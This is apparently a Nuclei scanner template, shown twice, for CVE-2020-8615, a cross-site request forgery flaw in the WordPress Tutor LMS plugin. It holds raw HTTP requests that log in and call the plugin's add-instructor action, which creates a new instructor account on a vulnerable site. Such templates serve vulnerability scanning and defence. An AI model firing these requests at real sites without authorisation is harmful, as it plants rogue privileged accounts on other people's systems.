nuclei-templates/http/cves/2020/CVE-2020-8615.yaml

id: CVE-2020-8615

info:
  name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery 
  author: r3Y3r53
  severity: medium
  description: |
     A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).
  remediation: update to v.1.5.3
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8615
    - https://wpscan.com/vulnerability/10058
    - http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
    cvss-score: 6.5
    cwe-id: CWE-352
    cve-id: CVE-2020-8615
    cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/tutor/"
  tags: cve,cve2023,csrf,wp-plugin,wp,tutor,wordpress,wpscan

variables:
  user: "{{rand_base(6)}}"
  pass: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        
        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1 
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        
        action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor

    cookie-reuse: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type_2, "application/json")'
          - 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")'
          - 'status_code_2 == 200'
        condition: and
templates added 2023-10-17 07:20:28 +00:00			`id: CVE-2020-8615`

			`info:`
			`name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery`
			`author: r3Y3r53`
			`severity: medium`
			`description: \|`
			`A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).`
			`remediation: update to v.1.5.3`
			`reference:`
			`- https://nvd.nist.gov/vuln/detail/CVE-2020-8615`
			`- https://wpscan.com/vulnerability/10058`
			`- http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N`
			`cvss-score: 6.5`
			`cwe-id: CWE-352`
			`cve-id: CVE-2020-8615`
			`cpe: cpe:2.3:a:themeum:tutor_lms::::::wordpress::*`
			`metadata:`
			`verified: true`
			`max-request: 1`
			`publicwww-query: "/wp-content/plugins/tutor/"`
			`tags: cve,cve2023,csrf,wp-plugin,wp,tutor,wordpress,wpscan`

			`variables:`
			`user: "{{rand_base(6)}}"`
			`pass: "{{rand_base(8)}}"`
			`email: "{{randstr}}@{{rand_base(5)}}.com"`
			`firstname: "{{rand_base(5)}}"`
			`lastname: "{{rand_base(5)}}"`

			`http:`
			`- raw:`
			`- \|`
			`POST /wp-login.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`log={{username}}&pwd={{password}}&wp-submit=Log+In`

			`- \|`
			`POST /wp-admin/admin-ajax.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor`

			`cookie-reuse: true`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'contains(content_type_2, "application/json")'`
			`- 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")'`
			`- 'status_code_2 == 200'`
			`condition: and`